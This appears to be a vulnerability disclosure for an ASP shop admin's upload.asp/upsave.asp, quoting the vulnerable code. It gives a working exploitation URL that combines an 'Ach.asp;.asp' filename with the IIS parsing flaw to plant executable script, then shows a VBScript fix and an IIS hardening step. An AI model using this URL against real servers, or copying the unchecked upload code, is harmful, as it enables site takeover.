The vulnerability lies in the upload.asp page.
No verification is performed:
<!--#include file="../include/nowshop.asp"-->
<%
' All three values are copied from the request into the session unchecked
session("fuptype") = request("fuptype")
session("fupname") = request("fupname")
session("frmname") = request("frmname")
Server.ScriptTimeOut = 99999
%>
<html>
<head>
<title>File Upload</title>
<meta name="Description" content="">
<link href="../images/css.css" type="text/css" rel="stylesheet">
<link href="../list/newhead.css" type="text/css" rel="stylesheet">
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<body bgcolor="#D9EAFC">
<table align="left"><tr><td>
<form name="form1" method="post" action="upsave.asp" enctype="multipart/form-data"> <!-- calls upsave.asp -->
<b>Select the file to be uploaded:</b><br>
<input type="file" name="file1">
<input type="submit" name="submit" value="Upload"><br>
,,,,,,,,,
</html>
As shown, nothing has been verified by the time upsave.asp is called. Some versions add file restrictions in upsave.asp, but they are still exploitable in combination with IIS:
If file.fileSize > 0 Then
    filename = fupname + "."    ' this is the vulnerable location
    filenameend = file.filename
    filenameend = Split(filenameend, ".")
    n = UBound(filenameend)
    filename = filename & filenameend(n)
    If fuptype <> "db" Then
        If file.fileSize > 200000 Then
            Response.write "<script language=javascript>"
            Response.write "alert('The file you uploaded is too large and cannot be uploaded successfully. The maximum size of a single file cannot exceed 200 KB!');"
            Response.write "location.href='javascript:history.go(-1)';"
            Response.write "</script>"
            Response.end
        End If
    End If
    ' The extension is checked only for the adv and pic types
    If fuptype = "adv" Or fuptype = "pic" Then
        If LCase(filenameend(n)) <> "gif" And LCase(filenameend(n)) <> "jpg" And LCase(filenameend(n)) <> "swf" And LCase(filenameend(n)) <> "htm" Then
            Response.write "<script language=javascript>"
            Response.write "alert('The file format you selected cannot be uploaded. Please check and upload again!');"
            Response.write "location.href='javascript:history.go(-1)';"
            Response.write "</script>"
            Response.end
        End If
    End If
    If fuptype = "adv" Then
        Savepath = "../images/adv/" & filename
    ElseIf fuptype = "pic" Then
        Savepath = "../pic/digi/" & filename
    ElseIf fuptype = "pic1" Then
        Savepath = "../pic/digi1/" & filename
    ElseIf fuptype = "link" Then
        Savepath = "../images/links/" & filename
    ElseIf fuptype = "db" Then
        Savepath = "./" & filename
The exploitation URL is as follows:
http://127.0.0.1/admin/upload.asp?fuptype=db&fupname=Ach.asp;.asp&frmname=Ach.asp
This example combines the Ach.asp;.asp name with the IIS parsing vulnerability.
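
One way to close this hole in upsave.asp, as an added example that is not the application's own code: the stored name is generated on the server, the extension is allowlisted for every upload type, and fuptype can only select from a fixed directory map. SafeSavePath and the gif/jpg-only allowlist are assumptions made for this example.

```vbscript
' Added example: server-side naming for upsave.asp (not the application's code).
' SafeSavePath is a hypothetical helper; the directory map copies the Savepath
' branches shown above, minus "db", which writes beside the admin scripts.
Function SafeSavePath(fuptype, clientFileName)
    Dim dirs, parts, ext, guid
    SafeSavePath = ""                       ' "" means: reject the upload

    ' 1. fuptype may only select a directory from a fixed map.
    Set dirs = Server.CreateObject("Scripting.Dictionary")
    dirs.Add "adv",  "../images/adv/"
    dirs.Add "pic",  "../pic/digi/"
    dirs.Add "pic1", "../pic/digi1/"
    dirs.Add "link", "../images/links/"
    If Not dirs.Exists(fuptype & "") Then Exit Function

    ' 2. Allowlist the extension for every upload type, not only adv and pic.
    '    Assumption: images only; htm and swf are dropped as active content.
    parts = Split(clientFileName & "", ".")
    If UBound(parts) < 1 Then Exit Function
    ext = LCase(parts(UBound(parts)))
    If ext <> "gif" And ext <> "jpg" Then Exit Function

    ' 3. Build the stored name on the server. fupname and the client file
    '    name never reach the path, so "Ach.asp;" cannot appear in it.
    guid = Server.CreateObject("Scriptlet.TypeLib").Guid
    SafeSavePath = dirs(fuptype & "") & Replace(Mid(guid, 2, 36), "-", "") & "." & ext
End Function

' Caller in upsave.asp: the session supplies only the type, never a name.
Dim target
target = SafeSavePath(Session("fuptype"), file.FileName)
If target = "" Then
    Response.Status = "400 Bad Request"
    Response.End
End If
' target is now safe to hand to the upload component's save routine.
```

Independently of the code, removing script execute permission from the upload directories in IIS keeps a stored file from being run as ASP even if a bad name slips through.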